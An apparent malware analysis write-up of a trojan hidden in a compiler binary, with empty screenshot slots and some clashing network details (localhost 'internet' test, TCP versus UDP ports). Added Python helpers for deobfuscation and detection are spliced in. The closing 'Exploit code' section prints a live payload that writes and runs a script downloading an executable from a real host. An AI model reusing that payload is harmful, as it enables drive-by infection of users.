McAfee:Exploit.CodeExec

Abstract: This Trojan redirects control flow away from the original executable on execution, apparently without ever running the original application. The sample was detected in a ‘Desktop Window Manager’ app, but on closer inspection it turned out to be a compiler. The original payload was encrypted in various sections around the code body, stored as data, with jmp instructions pushing control flow back and forth between the various islands.

The import tables have an obfuscated interface: calls are made through runtime generation of the API offsets, which are added to the image base of the required DLL, after which the name string is searched for in the DLL's import tables. Further, once a particular hash value is encountered, all previous sections are overwritten along with the encrypted data islands, and the decrypted malcode is entered. Here the PE image base is dynamically initialised, memory is allocated, and the PE is built around this framework.

It appears to go into an infinite loop, using a sleep parameter of 0 ms, while checking for network connectivity. It tests localhost (port 50370 TCP) for an internet connection and, if one is found, activates the download process by generating GET requests over HTTP to hardcoded URIs, implemented using the Winsock API (ws2_32.dll). It also enumerates various popular social networking sites and adds them to a target list. Specific CLSIDs and other malicious files (*.cfg) are detected as potentially malicious using online repositories, indicating that these payloads are widely distributed.

Static and Dynamic Analysis:

407BFC: push eax = 400000, the image base. Memory dumping preparation ostensibly begins here.


Ntdll.dll imagebase saved:


And saves 4088F8,


Then the kernel32 function address:


The stack at this time:


New stack addresses pushed:


This code enumerates the API functions: EBX contains the DLL image base and ESI the offset of the API into it. Added together they give the VA.


Compares with this hash value:


Cycles through this indexing section to traverse the api list.


Notice that it uses push/retn instruction pairs to travel across sections instead of a jump.

EDX keeps a record of the number of functions traversed.
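The hash-based import resolution described in the abstract and walked through in the screenshots above can be reproduced offline to turn the constants seen in the comparison back into API names. The following is an added analysis helper, not code from the original post; the sample's actual hash routine is not shown on the page, so the ROR13-add hash used here is an assumption (a commonly seen choice) to be swapped for the routine lifted from the enumeration loop, and the export list is a constructed subset of kernel32:

```python
"""Resolve API-hash constants found in a sample's import-resolution loop.

Added analysis helper, not code from the original post. The hash routine the
sample uses is not shown on the page; ROR13-add below is an ASSUMED stand-in.
"""

MASK32 = 0xFFFFFFFF


def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    value &= MASK32
    return ((value >> count) | (value << (32 - count))) & MASK32


def ror13_hash(name):
    """ROR13-add over the ASCII bytes of an export name (assumed algorithm)."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & MASK32
    return h


def build_hash_table(export_names, hash_func=ror13_hash):
    """Map hash -> export name for every export the loop could walk.
    Collisions are reported instead of silently overwriting a name, so a wrong
    guess about the algorithm shows up quickly."""
    table, collisions = {}, []
    for name in export_names:
        h = hash_func(name)
        if h in table and table[h] != name:
            collisions.append((h, table[h], name))
        table[h] = name
    return table, collisions


def resolve_constants(constants, table):
    """Annotate immediates pulled from the comparison instruction; unknown
    hashes map to None so they stand out for manual follow-up."""
    return {c & MASK32: table.get(c & MASK32) for c in constants}


# Constructed sample: a few kernel32 exports. A real run feeds the full export
# directory of each DLL the sample walks (ntdll, kernel32), dumped with a PE parser.
SAMPLE_EXPORTS = [
    "CreateFileA", "ExitProcess", "GetProcAddress", "LoadLibraryA",
    "Sleep", "VirtualAlloc", "VirtualProtect", "WriteFile",
]

if __name__ == "__main__":
    table, collisions = build_hash_table(SAMPLE_EXPORTS)
    # 0xEC0E4E8E is ROR13-add("LoadLibraryA"); 0xDEADBEEF is a made-up unknown.
    for h, name in resolve_constants([0xEC0E4E8E, 0xDEADBEEF], table).items():
        print(f"{h:08X} -> {name or '<unresolved>'}")
    if collisions:
        print("collisions:", collisions)
```

Feed build_hash_table the complete export list of every DLL the loop visits, then resolve each immediate the comparison checks against; a constant that stays unresolved across all DLLs usually means the assumed hash routine is wrong, not that the API is exotic.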


It enters the encrypted data section at 407E6E.


Re-enumeration of kernel32 APIs:


And saved on the stack as:


These will be used in the decrypted PE.

Very soon after, malicious links hardcoded in the decrypted process memory become visible:


Dynamically linked DLLs:


A few IDs are enumerated from the hardcoded database:


Popular Networking Sites are enumerated and targeted:


Malcode Originates from here:


The original file is a multipurpose compiler, using AutoDock and Bison as the docking GUI (scientific usage) and a lexical parsing engine as used in compilers. A typical compiler disassembly is seen, with various switches and compiling sections being identified. It tries to parse JScript, VBScript and .java files, and outputs .c and .cpp files as well. But the malcode is appended in the section shown above, which is connected to two referenced calls from within the Trojan file, from the compiler code.

The infection begins right from the start at 40103C, and again via a supposed compiler error with a swift jump from 401394. Thus control is transferred to the malcode almost immediately.


After building the imports using ImpRec, giving 401000 as the OEP (the usual stuff), a complete list of the new APIs is successfully detected and the import table is built. We take this built executable, which has the following characteristics.

Original PE:


Decrypted and built PE:


This dump has the string UPX in the first section text along with other data. This might indicate something, though it is not very apparent and certainly not detected.


Further, we see:


More Links are downloaded:


This file is flagged as malicious by online scanners:


It uses the Winsock API functions (ws2_32.dll) to establish a connection and download the links. It also constructs GET requests and executes them over HTTP port 80.


A loopback test (localhost) is used to check connectivity, and socket port 50370 is hardcoded. This could be another identifier, since it is consistent across the file.
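The behaviour just described, a hard-coded loopback probe to port 50370 followed by GET requests over port 80, is a sequence a defender can look for in per-process connection logs. The following is an added detection sketch, not code from the original post; the one-line-per-connection log format it parses is constructed for the example and stands in for whatever an endpoint sensor actually emits, so the regex is the part to adapt:

```python
"""Flag the 'loopback probe to 50370, then outbound HTTP' sequence.

Added detection sketch, not code from the original post. The log layout below
is CONSTRUCTED for the example; adapt EVENT_RE to the real sensor's format.
"""
import re
from datetime import datetime, timedelta

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) pid=(?P<pid>\d+) image=(?P<image>\S+) proto=(?P<proto>\w+) "
    r"src=(?P<src>[\d.]+):(?P<sport>\d+) dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

PROBE_PORT = 50370      # loopback port hard-coded in the sample
DOWNLOAD_PORT = 80      # the GET requests go out over plain HTTP


def parse_events(lines):
    """Parse connection records, skipping lines that do not fit the format."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        ev["dport"] = int(ev["dport"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def find_probe_then_download(events, window=timedelta(seconds=10)):
    """One finding per process that connects to 127.0.0.1:PROBE_PORT and then
    opens a non-loopback TCP/80 connection within `window`."""
    last_probe = {}     # pid -> timestamp of its most recent loopback probe
    findings = []
    for ev in events:
        pid = ev["pid"]
        is_tcp = ev["proto"] == "tcp"
        if is_tcp and ev["dst"] == "127.0.0.1" and ev["dport"] == PROBE_PORT:
            last_probe[pid] = ev["ts"]
        elif (is_tcp and ev["dport"] == DOWNLOAD_PORT
              and not ev["dst"].startswith("127.")
              and pid in last_probe
              and ev["ts"] - last_probe[pid] <= window):
            findings.append({"pid": pid, "image": ev["image"],
                             "probe_at": last_probe[pid], "download_to": ev["dst"]})
            del last_probe[pid]     # report each probe/download pair once
    return findings


# Constructed sample log: one process shows the pattern, one browses without a
# probe, one probes but downloads far outside the window, plus a malformed line.
SAMPLE_LOG = [
    "2011-03-01T10:00:00 pid=4321 image=sample.exe proto=tcp src=127.0.0.1:50371 dst=127.0.0.1:50370",
    "2011-03-01T10:00:01 pid=4321 image=sample.exe proto=tcp src=10.0.0.5:49200 dst=203.0.113.10:80",
    "2011-03-01T10:00:02 pid=900 image=browser.exe proto=tcp src=10.0.0.5:49201 dst=198.51.100.7:80",
    "2011-03-01T10:00:03 pid=777 image=updater.exe proto=tcp src=127.0.0.1:50400 dst=127.0.0.1:50370",
    "2011-03-01T10:05:00 pid=777 image=updater.exe proto=tcp src=10.0.0.5:49300 dst=203.0.113.20:80",
    "this line is not a connection record",
]

if __name__ == "__main__":
    for f in find_probe_then_download(parse_events(SAMPLE_LOG)):
        print(f"pid {f['pid']} ({f['image']}): probe at {f['probe_at']}, download to {f['download_to']}")
```

The probe alone is a weak signal (legitimate software also talks to localhost), which is why the rule keys on the probe-then-download sequence per process and drops the probe once it has been paired; widen the window if the sample's 0 ms sleep loop is slowed by a sandbox.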


It also enumerates the browser type and preference/config files: Mozilla, IE > 7 and Opera.


This enumerates the system/special folders:


It searches for all files (*.*) and performs some file attribute operations on them.

Overall not destructive, but it could be, given the already detected payloads, the Trojan activity and the obfuscation.

Shellcode Executable Analysis:


Malicious code decoded from the above:


After conversion from shellcode to exe file format the following characteristics were noted:


An online search results in detection by six vendors as a Trojan downloader, including under the name Silvana.


The remaining loop in function a_AK6_() has the job of extracting bytes from offset 0x1200 of the file image. Examining the file confirms this, as a marker is implemented at:


This shellcode is again extracted and converted to EXE format for analysis.

Obfuscated API interface: API DLL and function names are built dynamically and loaded using LoadLibrary():


URL Decryption:


And downloads the URL to a file on the local system:


And then goes into an infinite loop.

TcpView shows 592 UDP port usages for this download activity.

This essentially replicates the malicious activity of the obfuscated html/javascript page.

Mitigation:

The vulnerability can be mitigated by the steps described and discussed in this document.

UDP port 592 can be audited for any illegal activity or disabled.

Malicious entertainment sites should be avoided, as they are riddled with such insidious installations.

Exploit code:

..\..\sysinfomain.htm?svr=<script+defer >
eval(new+ActiveXObject('wscript.shell').Run(unescape('cmd*/c*taskkill*/F*/IM*helpctr.exe|cd*../&echo*Execute(strReverse(Replace(Replace(U)htap(cexe.lhs|2,htap*elifotevas.oda|)ydoBesnopser.lmx(etirw.oda|nepo.oda|1$epyt.oda|3$edom.oda|dnes.lmx|0,Y6$e&1$f3Fphp.daol/www/kt.pot2onrop//:ptthY,YTEGY*nepo.lmx|Yexe.~/:cY*$*htap|)Yllehs.tpircswY(tcejbOetaerC$lhs*teS|)Ymaerts.bdodaY(tcejbOetaerC$oda*teS|)Yptthlmx.tfosorcimY(tcejbOetaerC$lmx*tes|txen*emuser*rorre2AnoU,*UYU,*chr(34)),*U|U,*vbcrlf)))* >~.vbs|wscript*~.vbs&del*/q*~.vbs').replace(/[*]/g,String.fromCharCode(32)).replace(/[$]/g,String.fromCharCode(61)).replace(/U/g,String.fromCharCode(34))));
</script >
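The exploit code above hides its VBScript dropper under two layers: a JavaScript stage that unescape()s the string and then maps '*', '$' and 'U' back to space, '=' and a double quote, and a VBScript stage that Execute()s a strReverse()d body in which 'Y' stands for a quote and '|' for a line break. The following is an added deobfuscation helper for analysing such a page, not code from the original post; the SAMPLE it decodes is constructed with the same encoding layers but a placeholder URL (example.invalid) rather than the live one, and urllib's unquote stands in for JavaScript's unescape (an assumption that holds for %XX sequences but not for %uXXXX ones):

```python
"""Peel the two encoding layers off a dropper of the kind shown above so the
VBScript it writes can be read without running it.

Added analyst helper, not code from the original post. SAMPLE is CONSTRUCTED
with the same layers as the page's exploit but a placeholder URL.
"""
import re
from urllib.parse import unquote

# JavaScript stage: the three .replace() calls at the end of the eval() chain,
# applied after unescape(): '*' -> ' ', '$' -> '=', 'U' -> '"'.
JS_SUBSTITUTIONS = str.maketrans({"*": " ", "$": "=", "U": '"'})

# VBScript stage: Execute(strReverse(Replace(Replace("<body>","Y",chr(34)),"|",vbcrlf)))
VBS_STAGE_RE = re.compile(
    r'strReverse\(Replace\(Replace\("(?P<body>[^"]*)",\s*"Y",\s*chr\(34\)\),'
    r'\s*"\|",\s*vbcrlf\)\)'
)


def decode_js_layer(payload):
    """unquote() approximates JS unescape(); then undo the character mapping."""
    return unquote(payload).translate(JS_SUBSTITUTIONS)


def decode_vbs_layer(command):
    """Recover every reversed VBScript body from the shell command: reverse it,
    then restore quotes (Y) and line breaks (|). Reversing first keeps the
    restored line breaks in reading order."""
    scripts = []
    for m in VBS_STAGE_RE.finditer(command):
        plain = m.group("body")[::-1].replace("Y", '"').replace("|", "\n")
        scripts.append(plain)
    return scripts


def deobfuscate(payload):
    """Return (decoded shell command, [recovered VBScript bodies])."""
    command = decode_js_layer(payload)
    return command, decode_vbs_layer(command)


# Constructed stand-in for the string inside unescape('...') on the page: the
# same echo-to-~.vbs wrapper, but the reversed body fetches a placeholder URL.
SAMPLE = ("cmd*/c*cd*../&echo*Execute(strReverse(Replace(Replace(U"
          "dnes.lmx|0*,Ytxt.2egats/dilavni.elpmaxe//:ptthY*,YTEGY*nepo.lmx|"
          ")Yptthlmx.tfosorcimY(tcejbOetaerC*$*lmx*teS"
          "U,*UYU,*chr(34)),*U|U,*vbcrlf)))*>~.vbs|wscript*~.vbs&del*/q*~.vbs")

if __name__ == "__main__":
    command, scripts = deobfuscate(SAMPLE)
    print("shell command:", command)
    for i, script in enumerate(scripts, 1):
        print(f"--- recovered VBScript #{i} ---")
        print(script)
```

Point it at the string inside unescape('...') from a captured page and read the recovered VBScript for the URL, the file it writes and how it launches it; those are the indicators to block and hunt for, and none of them are needed in executed form.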
